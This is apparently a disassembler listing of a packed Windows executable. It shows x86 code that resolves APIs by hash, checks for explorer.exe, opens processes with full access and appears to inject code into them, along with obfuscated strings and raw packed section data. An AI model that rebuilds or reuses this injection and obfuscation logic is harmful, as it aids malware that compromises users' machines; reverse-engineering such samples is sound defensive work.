loc_402A27: ; CODE XREF: sub_4029F5+2A�j
cmp dword_404104, 0A9h
jle short loc_402A3D
mov dword_404104, 19h
loc_402A3D: ; CODE XREF: sub_4029F5+3C�j
mov edi, 774393E8h
push edi
push 1
call sub_401117
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push ebx
call eax
xor ecx, ecx
cmp eax, ebx
jz short loc_402A77
loc_402A62: ; CODE XREF: sub_4029F5+80�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_402A72
mov [ebp+var_4], edx
loc_402A72: ; CODE XREF: sub_4029F5+78�j
inc ecx
cmp ecx, eax
jnz short loc_402A62
loc_402A77: ; CODE XREF: sub_4029F5+6B�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, 20202020h
or edx, eax
cmp edx, 6C707865h
jnz loc_402B82
mov edx, [ecx+4]
or edx, eax
cmp edx, 7265726Fh
jnz loc_402B82
mov ecx, [ecx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402B82
mov eax, [ebp+arg_4]
dec eax
jnz loc_402B7B
push 8
pop ecx
push 0Ch
mov esi, offset dword_404208
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_403254
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014C3
mov esi, eax
cmp esi, ebx
pop ecx
jz loc_402B7B
cmp dword_404104, 0Bh
jl short loc_402B08
inc dword_404104
loc_402B08: ; CODE XREF: sub_4029F5+10B�j
cmp dword_404104, 0C6h
jle short loc_402B1E
mov dword_404104, 1Dh
loc_402B1E: ; CODE XREF: sub_4029F5+11D�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402B7B
push ebx
push esi
push offset sub_402857
call sub_402498
add esp, 0Ch
push 3Ch
pop eax
push 2Eh
pop ecx
loc_402B50: ; CODE XREF: sub_4029F5+16E�j
cmp ecx, 0BAh
ja short loc_402B5A
inc eax
inc ecx
loc_402B5A: ; CODE XREF: sub_4029F5+161�j
add eax, 2Fh
add ecx, 2Fh
cmp eax, 76h
jl short loc_402B50
push 723EB0D5h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402B7B: ; CODE XREF: sub_4029F5+C0�j
; sub_4029F5+FE�j ...
xor eax, eax
jmp loc_402D8C
; ---------------------------------------------------------------------------
loc_402B82: ; CODE XREF: sub_4029F5+94�j
; sub_4029F5+A5�j ...
push edi
xor edi, edi
inc edi
push edi
call sub_401117
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push ebx
call eax
push 0D89AD05h
push edi
call sub_401117
pop ecx
pop ecx
call eax
mov esi, eax
mov eax, dword_404104
add eax, 0FFFFFFDAh
cmp eax, 0BDh
ja short loc_402BBD
inc dword_404104
loc_402BBD: ; CODE XREF: sub_4029F5+1C0�j
push 80DBBE07h
push 6
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_404208
jz loc_402C86
push 10h
push esi
push offset aKDCMsR ; "Ƅ¬"
call sub_40102E
push 1B3D12B9h
push 6
call sub_401117
add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push ebx
call eax
test eax, eax
jz short loc_402C86
mov eax, dword_404104
add eax, 0FFFFFFA5h
cmp eax, 7Bh
ja short loc_402C1C
inc dword_404104
loc_402C1C: ; CODE XREF: sub_4029F5+21F�j
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
mov [ebp+var_18], edi
mov edi, [ebp+arg_4]
push 6
mov [ebp+var_10], eax
mov [ebp+var_C], 2
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_18]
push ecx
push ebx
push edi
call eax
mov edi, [ebp+arg_4]
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push edi
call eax
push 4Bh
pop eax
push 28h
pop ecx
loc_402C68: ; CODE XREF: sub_4029F5+288�j
cmp ecx, 0CCh
ja short loc_402C72
inc eax
inc ecx
loc_402C72: ; CODE XREF: sub_4029F5+279�j
add eax, 0Ah
add ecx, 0Ah
cmp eax, 98h
jl short loc_402C68
mov dword_404104, eax
jmp short loc_402C8B
; ---------------------------------------------------------------------------
loc_402C86: ; CODE XREF: sub_4029F5+1E6�j
; sub_4029F5+212�j
mov eax, dword_404104
loc_402C8B: ; CODE XREF: sub_4029F5+28F�j
cmp eax, 0Bh
jl short loc_402C96
inc eax
mov dword_404104, eax
loc_402C96: ; CODE XREF: sub_4029F5+299�j
cmp eax, 0BFh
jle short loc_402CA7
mov dword_404104, 1Ah
loc_402CA7: ; CODE XREF: sub_4029F5+2A6�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_403254
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014C3
mov esi, eax
cmp esi, ebx
pop ecx
jz loc_402D69
cmp dword_404104, 0Bh
jl short loc_402CEF
inc dword_404104
loc_402CEF: ; CODE XREF: sub_4029F5+2F2�j
cmp dword_404104, 0C6h
jle short loc_402D05
mov dword_404104, 1Dh
loc_402D05: ; CODE XREF: sub_4029F5+304�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402D69
push ebx
push esi
push offset sub_402857
call sub_402498
add esp, 0Ch
push 3Ch
pop eax
push 2Eh
pop ecx
loc_402D37: ; CODE XREF: sub_4029F5+355�j
cmp ecx, 0BAh
ja short loc_402D41
inc eax
inc ecx
loc_402D41: ; CODE XREF: sub_4029F5+348�j
add eax, 2Fh
add ecx, 2Fh
cmp eax, 76h
jl short loc_402D37
push 723EB0D5h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
jmp short loc_402D69
; ---------------------------------------------------------------------------
loc_402D64: ; CODE XREF: sub_4029F5+1E�j
call sub_401CC3
loc_402D69: ; CODE XREF: sub_4029F5+2E5�j
; sub_4029F5+32B�j ...
cmp dword_404104, 0DEh
jge short loc_402D7B
inc dword_404104
loc_402D7B: ; CODE XREF: sub_4029F5+37E�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
loc_402D8C: ; CODE XREF: sub_4029F5+188�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_4029F5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402DA0 proc near ; CODE XREF: sub_4014C3+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_402DB4: ; CODE XREF: sub_402DA0+29�j
cmp ecx, eax
jb short loc_402DC2
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_402DC2: ; CODE XREF: sub_402DA0+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_402DB4
sub_402DA0 endp
; ---------------------------------------------------------------------------
align 4
dd 8Dh dup(0)
dword_403000 dd 77E73167h ; DATA XREF: sub_4014C3+2B5�r
; sub_4017F6+C6�r ...
dword_403004 dd 77E76A2Eh ; DATA XREF: sub_4014C3+201�r
; sub_4014C3+282�r ...
dword_403008 dd 77E74672h ; DATA XREF: sub_4014C3+17B�r
; sub_4014C3+1C7�r
dword_40300C dd 77E74155h ; DATA XREF: sub_4014C3+2D3�r
; sub_4017F6+7A�r ...
dd 0
dword_403014 dd 77D4C96Ah ; DATA XREF: sub_401CC3+FB�r
; sub_401CC3+5C1�r ...
dd 0
dword_40301C dd 0D4C6DCEAh, 50686AD4h, 0D4D4C4h ; DATA XREF: sub_401117+B6�o
dword_403028 dd 0D6D4E8E6h, 0C450D0D2h, 0D4D4h ; DATA XREF: sub_401117+A7�o
dword_403034 dd 0DED0DEE2h, 50E4C6D0h, 0D4D4C4h ; DATA XREF: sub_401117+98�o
; sub_401CC3+16�o
dword_403040 dd 0ECCEEAECh, 0D4C450DEh, 0D4h ; DATA XREF: sub_401117+89�o
dword_40304C dd 0CEE0C4CEh, 686ADEECh, 0D4D4C450h, 0 ; DATA XREF: sub_401117+7A�o
dword_40305C dd 0EAE8C6E0h, 50D0D2DEh, 0D4D4C4h ; DATA XREF: sub_401117+54�o
dword_403068 dd 0F0h ; DATA XREF: sub_4014C3+2BE�o
dword_40306C dd 0DCCAE0EAh, 50E4EAD2h, 0C6FCC6h ; DATA XREF: sub_4014C3+246�o
dword_403078 dd 68E8C6E0h, 6Ch ; DATA XREF: sub_4017F6+65�o
dword_403080 dd 76C4DE40h, 0 ; DATA XREF: sub_401CC3+6FE�o
; ---------------------------------------------------------------------------
loc_403088: ; DATA XREF: sub_401CC3+63E�o
inc eax
retf 0C4D2h
; ---------------------------------------------------------------------------
dd 7668C6h
dword_403090 dd 7525h ; DATA XREF: sub_401CC3+5B7�o
aPRRvRbjf@Nv db 'Prvbjf@nv',0 ; DATA XREF: sub_401CC3+568�o
align 4
aUCr db '',0 ; DATA XREF: sub_401CC3+4E1�o
align 10h
aTP db 'P',0 ; DATA XREF: sub_401CC3+479�o
align 10h
aSP db 'P',0 ; DATA XREF: sub_401CC3+411�o
align 10h
dword_4030E0 dd 0ECDAE4EAh, 0E6E6FCFCh, 0ECDCEC50h, 0 ; DATA XREF: sub_401CC3+3A9�o
dword_4030F0 dd 0C4E4ECD2h, 0E6DAD0CEh, 0EC50E8E8h, 0ECDCh ; DATA XREF: sub_401CC3+341�o
dword_403100 dd 0CEC6E6E8h, 0E8E6D4D2h, 0EC50FEC8h, 0ECDCh ; DATA XREF: sub_401CC3+2DA�o
dword_403110 dd 0D4DEC6EEh, 0E0FEh ; DATA XREF: sub_401CC3+2AC�o
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
aTpRRvRbjf db 'Prvbjf',0 ; DATA XREF: sub_401CC3+249�o
align 4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 4
dword_403138 dd 0ECE4E4DCh, 0FE525278h, 0ECC2D0C2h, 0CEC4E6E4h, 0DEC850DEh
; DATA XREF: sub_401CC3+1DB�o
dd 0E8EC52F8h, 52EAC2D2h, 0D4C8C6C0h, 0E0EEE6DAh, 52E8h
aFfXrrtSsUFPRSR db 'xRRPRRR',0 ; DATA XREF: sub_401CC3+1C3�o
align 4
dword_403188 dd 0E0D6FCB4h, 0C0FCDED6h, 0C6FCC650h, 0 ; DATA XREF: sub_401CC3+1AC�o
dword_403198 dd 0DCEAC8B4h, 0FCCED2E6h, 0C6FCC650h, 0 ; DATA XREF: sub_401CC3+195�o
byte_4031A8 db 0B4h, 0FCh ; DATA XREF: sub_401CC3+17E�o
; ---------------------------------------------------------------------------
loc_4031AA: ; CODE XREF: UPX0:loc_4031AA�j
loopne loc_4031AA
; ---------------------------------------------------------------------------
dd 0FCC650E0h, 0C6h
dword_4031B4 dd 0D2C6E0B4h, 0FEC4D0DAh, 0C6FCC650h, 0 ; DATA XREF: sub_401CC3+167�o
dword_4031C4 dd 0D4E0D2B4h, 0DADECECAh, 0FCC650FCh, 0C6h ; DATA XREF: sub_401CC3+150�o
dword_4031D4 dd 0E2C6EEB4h, 50C0CEE6h, 0C6FCC6h ; DATA XREF: sub_401CC3+139�o
; ---------------------------------------------------------------------------
loc_4031E0: ; DATA XREF: sub_401CC3+11C�o
mov ah, 0EAh
retf 0D6D6h
; ---------------------------------------------------------------------------
db 50h, 0C6h, 0FCh
dd 0C6h
dword_4031EC dd 0C446h ; DATA XREF: sub_401CC3+E9�o
dword_4031F0 dd 0B4788Ah ; DATA XREF: sub_401CC3+C0�o
dword_4031F4 dd 0D0E8C6DAh, 686AD4C6h, 0D4D4C450h, 0 ; DATA XREF: sub_401CC3+51�o
dword_403204 dd 0E8C6EAE6h, 0C450686Ah, 0D4D4h ; DATA XREF: sub_401CC3+36�o
aKDCMsR db 'Ƅ¬',0 ; DATA XREF: sub_4029F5+1EF�o
align 4
aFP db 'P',0 ; DATA XREF: sub_402498+107�o
align 10h
aRfcATtKF db '',0 ; DATA XREF: sub_402498+EC�o
align 4
dword_403244 dd 0CAE0EAB4h, 0E4EAD2DCh, 0C6FCC650h, 0 ; DATA XREF: sub_402857+9B�o
dword_403254 dd 0D4ECFCC6h, 0E8C6E8D2h, 0C6FCC650h, 368h dup(0)
; DATA XREF: sub_4029F5+D6�o
; sub_4029F5+2BD�o
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402440+F�o
; sub_4029F5+19A�o
align 4
dd 3Ah dup(0)
dword_404104 dd 0E1h ; DATA XREF: sub_401117+23�w
; sub_401117:loc_4011D9�r ...
dword_404108 dd 40h dup(0) ; DATA XREF: sub_4017F6+B9�o
; sub_401CC3+1D1�o
dword_404208 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401117+4E�o
; sub_401117+74�o ...
dword_404308 dd 40h dup(0) ; DATA XREF: sub_4017F6:loc_4018B6�o
; sub_4017F6:loc_4018D4�o ...
byte_404408 db 1 ; DATA XREF: sub_40131A+27�r
; sub_40131A+67�w
byte_404409 db 1 ; DATA XREF: sub_40131A:loc_401338�r
; sub_40131A+35�w
align 4
dword_40440C dd 0 ; DATA XREF: sub_402857+116�o
; sub_402857+136�r
dword_404410 dd 0 ; DATA XREF: sub_402857+130�r
; sub_402857+14D�r
align 2000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 58h, 2000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 20140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 3FF00000h, 20062B01h, 2 dup(9060906h), 110F0D06h, 5D20281Dh
dd 16153E0Eh, 2B0F0806h, 49320806h, 0C06092Ah, 0B6D4866h
dd 290C5E3Dh, 6090A4Ch, 91D150Ch, 3D0C0C06h, 16082013h
dd 16170C49h, 616063Ch, 7072C0Ch, 10070710h, 64104A6Ah
dd 0C06095Ch, 0C060875h, 92A0C5Ah, 95D0C06h, 6810B1Dh
dd 17401B20h, 13290810h, 0B081305h, 17171712h, 0E171717h
dd 18330E0Ah, 2E2F3415h, 27412740h, 27412741h, 244B2741h
dd 0A450810h, 1010240Bh, 10102B38h, 402E1037h, 330C0609h
dd 0C061B65h, 104D0C2Dh, 8130607h, 0C060C34h, 0C060937h
dd 44420C3Eh, 0D430E0Ch, 2C700C06h, 590C0609h, 16063815h
dd 30110C06h, 5061B12h, 83C3912h, 0B8C0C06h, 6091A15h
dd 232F280Ch, 0E1E1019h, 7680E25h, 15140D0Bh, 0C06091Ah
dd 0C172F28h, 455000h, 4014C00h, 7FF37700h, 46h, 0
dd 200E000h, 8010B01h, 1E0000h, 0E0000h, 0
dd 29F500h, 100000h, 300000h, 40000000h, 100000h, 20000h
dd 400h, 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000004h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 326400h, 3C00h, 6 dup(0)
dd 500000h, 1FC00h, 0Ch dup(0)
dd 300000h, 1C00h, 6 dup(0)
dd 65742E00h, 7478h, 1DCB00h, 100000h, 1E0000h, 40000h
dd 3 dup(0)
dd 2000h, 64722E60h, 617461h, 31200h, 300000h, 40000h
dd 220000h, 3 dup(0)
dd 4000h, 61642E40h, 6174h, 41C00h, 400000h, 5 dup(0)
dd 4000h, 65722EC0h, 636F6Ch, 23C00h, 500000h, 40000h
dd 260000h, 3 dup(0)
dd 4000h, 500042h, 32BC00h, 504A00h, 51410000h, 7F3D0000h
dd 47FDF60Ch, 7D3FA218h, 5178C955h, 932F5E6Ah, 2F761B34h
dd 3D2E2EADh, 4BC6ECABh, 33765323h, 8AE47FFh, 0D22FB200h
dd 0C3E65B77h, 299DBE16h, 6C8F99A4h, 4BDBFED9h, 57570825h
dd 85D88B6Ah, 6A4C74DBh, 0FDD04C10h, 16099791h, 688A3D16h
dd 0FDC94385h, 0C2EEF57h, 3CA8488Bh, 753B5351h, 7B4268FCh
dd 0A8EC3BB6h, 56529E6Fh, 0B25FEB13h, 19AD7C06h, 8106C610h
dd 267EE80Eh, 981EE66Dh, 87006A86h, 0FB0D8D48h, 6A1660EEh
dd 0D5684BFFh, 28723EB0h, 0F0ADA59Ah, 2DF6035Bh, 0B0196E34h
dd 49964166h, 11310A0Ah, 0AAC0DCB6h, 325B4E36h, 0E1185859h
dd 6A1318B8h, 3B58821Dh, 99790F32h, 1010BFA4h, 0E868903Dh
dd 0E1581AC4h, 0A7774393h, 0BBF0CE47h, 0E8A02E66h, 9B9BB0FCh
dd 6A8AC490h, 0B6461105h, 51F41093h, 0C2EC1021h, 4A17286Fh
dd 2A4740Fh, 58D66AA3h, 0DB6DB63Dh, 416986B1h, 6C216640h
dd 6AC57921h, 23FBB847h, 0F445F7F3h, 0D89FF53h, 0FE7086A8h
dd 33753B7Dh, 0FCEAA7BFh, 4D9D9C8Dh, 0F685338Bh, 0D9ED9A49h
dd 0FB46454Ch, 0EC29AF0h, 2A2A9793h, 0B4DEC23Dh, 0E06F7BD2h
dd 10687F56h, 0BFAF0004h, 0EC093BE5h, 858DF8F8h, 5056F1E8h
dd 5BF87595h, 6EFB011Dh, 0C9680CD6h, 0D0189F16h, 67700461h
dd 0F0056DADh, 0B1CD20CAh, 61863724h, 8CCACC4Eh, 6B68F003h
dd 91F78426h, 39E4FB21h, 3C56FE28h, 1D759F7Dh, 871358Bh
dd 0D6FF5078h, 0C669654Bh, 8023DCDEh, 0F3AE9BDh, 0EA0C5885h
dd 61FFBF5Ch, 2A3D4B6Fh, 1EBF08Bh, 35BC804Eh, 67755C0Eh
dd 0F58EDEDCh, 4B15FF2Bh, 664D7E42h, 72033301h, 3124CF21h
dd 0BBEC6E6Ah, 6735848Dh, 7C043950h, 0D875D85Ch, 8434FE75h
dd 7AD5D85h, 42E484EDh, 0D20CB3CEh, 0B03C9F0h, 6C9D5740h
dd 0D894F707h, 0FFB02185h, 0E8299D07h, 9199F451h, 0C72D21DBh
dd 3FFC0083h, 0CE9B27B2h, 576B7480h, 0FF587493h, 66F90D33h
dd 8C034977h, 0FD322B59h, 0B230F358h, 0B2680177h, 2F1D572Ah
dd 0C1FED59h, 0E4E9ED68h, 1A422220h, 65A45921h, 8E1D108Ah
dd 31A0602Eh, 2B33270h, 0E09C8039h, 820F05DEh, 92D52E95h
dd 0A435B978h, 87CD332h, 0D9DB3353h, 204F1ADFh, 2948923h
dd 0E045C7E8h, 0A32C07D0h, 2F6941A3h, 5A566358h, 72C9FFE1h
dd 6853F784h, 534D481h, 7589036Ah, 0AF1A22E4h, 22E42E67h
dd 20392F3Bh, 0D9E53163h, 0C3F78478h, 73259C0Ch, 0BB69EF3Eh
dd 6AB5F24Bh, 33FB6598h, 64145D38h, 99F075D1h, 392A7415h
dd 3153071Ch, 6DDB31EFh, 3306052Eh, 22084B08h, 64EC836Dh
dd 1D23EB5Bh, 64B9F8E0h, 125DC97Dh, 8593DD7h, 0A5B0007Fh
dd 56BE987Fh, 0B87DBD66h, 1CF04E57h, 0B9D2BADAh, 3FDD10FBh
dd 27FFF41Bh, 2AB59A4h, 7EF88399h, 7868EB7Ch, 581AD09Ch
dd 0A5584B7Bh, 51E04DF8h, 32113B2Eh, 181DB361h, 830F0606h
dd 3D8105C8h, 6EC37BBCh, 276803F8h, 572F5CE0h, 0FC7D89ADh
dd 8FBA36A5h, 68A9B703h, 0F40C2021h, 7F7370BEh, 0FF888DE8h
dd 8FDEA8B7h, 48870FC4h, 59A49901h, 2B3066BAh, 217D2CEAh
dd 3D2C793Fh, 0F8F114AFh, 80685308h, 0DB42B659h, 0C053571Ah
dd 0C405854h, 61610C70h, 0AAEC0056h, 0B4612D35h, 296213CFh
dd 8F12C021h, 849A4749h, 39F43756h, 738CC095h, 7C85CF2h
dd 6D1470CAh, 0EB7E9BEDh, 74C33A64h, 0C368C665h, 8F0F3FD1h
dd 9373DC6Eh, 0D8E59775h, 0EC57DC4Dh, 0DEC88A8Dh, 9887CEC2h
dd 7B15858Ah, 7720399Bh, 1B803997h, 0C80CC923h, 0FB671FD3h
dd 7375BF0Dh, 0FEC056EBh, 4303FE3Dh, 105D8809h, 2BB004EBh
dd 28ACD82Ch, 0EC73267Ah, 0D4A4E407h, 0C689792h, 397314FBh
dd 362C8651h, 0E1F0112Dh, 7A27215Dh, 0C0AA2312h, 3084A50Bh
dd 1BCA8BBh, 3C8FC3C8h, 0CBF16880h, 0EC53AEF7h, 6C5984B6h
dd 0E76AE4D1h, 6B6CEC31h, 2C77F84Ch, 0E2DFB4AAh, 233B54D6h
dd 0F87F0F74h, 38097D02h, 333ADFBh, 8450E0Bh, 1A5B5425h
dd 2761F1A1h, 64FE488Dh, 1F1F0420h, 0EB059777h, 5274285Ah
dd 8B3D8C05h, 2A5CC177h, 406A46FCh, 0B388458Dh, 0BA44848Dh
dd 3F5258D9h, 46318AC7h, 73C8D014h, 84AB58B9h, 59BB0050h
dd 54B57075h, 57501BBh, 0AD081050h, 0B7AF42EBh, 0FFC88333h
dd 88245BCCh, 2D5207CEh, 0B002B473h, 484A346Dh, 57BF233Dh
dd 0F916436Eh, 221F3F95h, 5A0C1A04h, 213E403Ah, 0DE3C1CF4h
dd 0B756134Bh, 1201707Fh, 481DFB1Dh, 662CDE05h, 7A813811h
dd 0E8D404Fh, 54802361h, 404FD04Ah, 0C085A41Eh, 0DBCB7459h
dd 833FB33Dh, 6E9E42B1h, 0DE9779F0h, 2CCF67ECh, 0F87265BCh
dd 0B7C5402h, 2B1910Bh, 540EEC28h, 1B7B343Fh, 0D356ACECh
dd 32C05814h, 5B8F3D18h, 3B191C0h, 8BE03209h, 6B6D853Dh
dd 56550EE0h, 0D738C439h, 22CE7927h, 16D41C63h, 0BE460DD4h
dd 0E4C41901h, 90B40C2Dh, 0F4406791h, 0C064A809h, 9804192Eh
dd 9E461416h, 2488B901h, 2E916025h, 17E44902h, 39BE8E26h
dd 66333890h, 19747D81h, 0F89ECFF8h, 901BEA5Eh, 30C5B94h
dd 6EE10616h, 53075757h, 59BF0409h, 8F07345Bh, 856FCBC4h
dd 8BD79BC4h, 0FB190B1Dh, 504286B0h, 146AD312h, 0A8D1C2Ch
dd 90FD0391h, 0B05D9615h, 23132660h, 6110F207h, 93106C36h
dd 96253318h, 98A170ECh, 2E759DA3h, 0C56254h, 1006B919h
dd 0D8765C8Ch, 995211ABh, 0C6000E90h, 1813200h, 136C6201h
dd 8A93B86Ch, 702402h, 96D9239Ch, 466FD8Dh, 0C958DB36h
dd 7064F020h, 90196D25h, 1467B223h, 8264A0Ch, 29E4E019h
dd 0D0642099h, 242547F4h, 249FC090h, 60323245h, 54B408CFh
dd 8331A25Eh, 398EFC89h, 69095802h, 4E090F85h, 30181EC6h
dd 1D6AEFDFh, 8CBE9486h, 0E2684AFEh, 0A5270118h, 0CE51444Dh
dd 290697E2h, 8359B403h, 18637BF9h, 5E781105h, 0ECB13D18h
dd 0D5B9061Bh, 504C4DBDh, 0C5904EBFh, 0E08A5768h, 0ADDDFF6h
dd 80591D04h, 8800697Dh, 6756145h, 3C3063BCh, 0E856F6D8h
dd 13046916h, 0BB95630Fh, 0B25F8A3Dh, 4E4896FDh, 6C6C4350h
dd 0F23C1704h, 606D2334h, 19046D62h, 0B6C21B70h, 29602962h
dd 20006418h, 5CD63253h, 0D388D507h, 1B0790B6h, 0B93DC282h
dd 1DAEDBCBh, 8B66C6B0h, 0E484490Bh, 2C1D596Fh, 5A646FFCh
dd 88037430h, 556A5A65h, 0AE35130Fh, 24CB0382h, 6AC2828h
dd 7AF656F9h, 5B6C46C9h, 591B64B9h, 58BF5858h, 64AC3B5Ch
dd 0D18004E4h, 65D6460Ch, 0C2002924h, 2CE42E40h, 38BD0357h
dd 166606FCh, 2B1968D4h, 0BF0E9590h, 7924BF15h, 0C978C583h
dd 0F0DFBF11h, 9A8581F0h, 7B281218h, 71DFC030h, 6832FD09h
dd 1297812Ch, 748CD033h, 72F56826h, 0D92AD80Eh, 0F3143D99h
dd 0D0FCBC03h, 0D1386603h, 5FC57424h, 4B8B558Eh, 22C25EDEh
dd 0A00310A1h, 0D2245F10h, 47D90F20h, 2F97C027h, 0C8033C48h
dd 0C8DF89D1h, 417F8B90h, 38708B18h, 0CEDC4D89h, 0E4067FF3h
dd 27E11C42h, 0A08B638Ch, 13A160B0h, 8AFFB19Eh, 6A6F16E2h
dd 0F7F82609h, 0E7C01BDFh, 9C81F3Ch, 0A79A6635h, 5B0A25B7h
dd 0EFB2F535h, 0A5356F7h, 0DF3B04FFh, 0C3995B14h, 18E0328Dh
dd 9430684Eh, 0D96D53D9h, 2405CDh, 8325F4EEh, 82825A64h
dd 0D0537AB0h, 0C81C5938h, 0AA12C03Dh, 0C183022h, 0BC149018h
dd 17F6091Dh
dd 2233AEC8h, 0EAEE6824h, 18111FC0h, 8BE8C995h, 29BC73F0h
dd 62E842E4h, 0F10FF07Fh, 8615D57Bh, 1CC308Bh, 1756B26Ch
dd 540F8162h, 0F93CE075h, 7D78501Ah, 955377E8h, 813646EAh
dd 51A2B894h, 8D1BFC6Eh, 1448C619h, 6AEC4D03h, 582DF250h
dd 0ACFF6F8Ch, 404202B4h, 0FB11C283h, 0B6FA8111h, 6FB661EFh
dd 0C68B5741h, 0C90EC72Bh, 48868AC3h, 757DBFC4h, 0F12FFF1Bh
dd 0C7033441h, 0BE8D383Fh, 78810975h, 9078B06h, 6EDF0315h
dd 0EDF142FFh, 302408Bh, 0EB1A0C41h, 0EB084B0Dh, 66654001h
dd 3966FEEBh, 40FA7518h, 4AEF0540h, 1BFF41A9h, 0C49EDB5h
dd 8525F8BFh, 8AFC397Ch, 0CB3A4008h, 0FB46FF74h, 0F98030FFh
dd 0F0773F0h, 0F903C9B6h, 0F6A40FEBh, 0E1C10FE1h, 0C7CA0B10h
dd 0E6B6D1Ah, 5EAF8B41h, 0B2D97526h, 9B7A04E2h, 0BA620538h
dd 0EAEA4871h, 0BD752B68h, 19730875h, 10CE97FFh, 5775FE8Bh
dd 1874B368h, 925323E6h, 5429A490h, 3802A00Ch, 39C1268h
dd 97FC04C4h, 76C41334h, 0E02F686Ah, 8A6AAA1Dh, 4A56D4D6h
dd 400260F0h, 0C972BE56h, 1055104Ah, 0E5656023h, 0BD89C8CFh
dd 241FFDA0h, 87596F5Dh, 7B6C1538h, 0C97F05D1h, 3D0E0ECBh
dd 956768BCh, 23B077CDh, 0F44984ABh, 1019BAF4h, 0B613EC2Eh
dd 961918ADh, 8AAD0593h, 14C606Bh, 3E430557h, 43F83CB9h
dd 96E92653h, 4D9A60CEh, 17AA9603h, 58A4C6FFh, 0F0F7A817h
dd 336FB89Ah, 240353FFh, 0E69F6203h, 76D60C56h, 14585741h
dd 53A50640h, 207F64C4h, 374A685Fh, 46949A1h, 7C422892h
dd 602FB4AFh, 0F0202F05h, 1E304422h, 988E0D97h, 0FEFACE1Ch
dd 0CD89460Fh, 35A27C8Eh, 21EBFE30h, 49C1105Eh, 0BCB85F9Ah
dd 468DB857h, 7683F6EDh, 0F5853DACh, 0E81A66E4h, 164AD105h
dd 0D54061ABh, 0B6602B90h, 0C30CEB05h, 0B103B9B8h, 576C175Dh
dd 2CFFC99Bh, 76051034h, 0CBB76E4h, 31C30C25h, 0CE569414h
dd 58AE8B16h, 681CC7F6h, 7B88BF3Bh, 7831EA53h, 8E16499h
dd 0A8415E59h, 0B23D2323h, 247C26C1h, 8AA260CBh, 10323E76h
dd 65701828h, 5B5C9B5Bh, 3CF38330h, 0FCEF1701h, 52215AB7h
dd 0B170AC3Dh, 2984034Bh, 1D392E09h, 97EDA91Ah, 0BF868180h
dd 76BEC14Ch, 6F0ED9C4h, 33088D51h, 0FDD8A5C9h, 15740105h
dd 0C50D948Dh, 0E77A8010h, 0FE8942FBh, 0FC558903h, 0E4C83B41h
dd 0B8118BC8h, 0A5AF0020h, 0D00BB4BEh, 7078655Eh, 42F3C26Ch
dd 0DFE59FDBh, 6F100451h, 0E2726572h, 0C80B0849h, 0D16D2EE3h
dd 65226DA3h, 481BC210h, 0B33820B5h, 0D3FDC009h, 7E0406D6h
dd 0C87D75B8h, 0ABF354D8h, 0B11BC848h, 1209417Ah, 0CEC23B2Ah
dd 59F3DB70h, 0CE3D82DFh, 6409E00Bh, 1DC6E406h, 43F1CF78h
dd 0FF6804A2h, 46BB1F0Fh, 0C286C878h, 0A93C4074h, 3C6A5718h
dd 5C2C932Bh, 8E592E8Fh, 8022FBAh, 0F8701A93h, 8D4D1976h
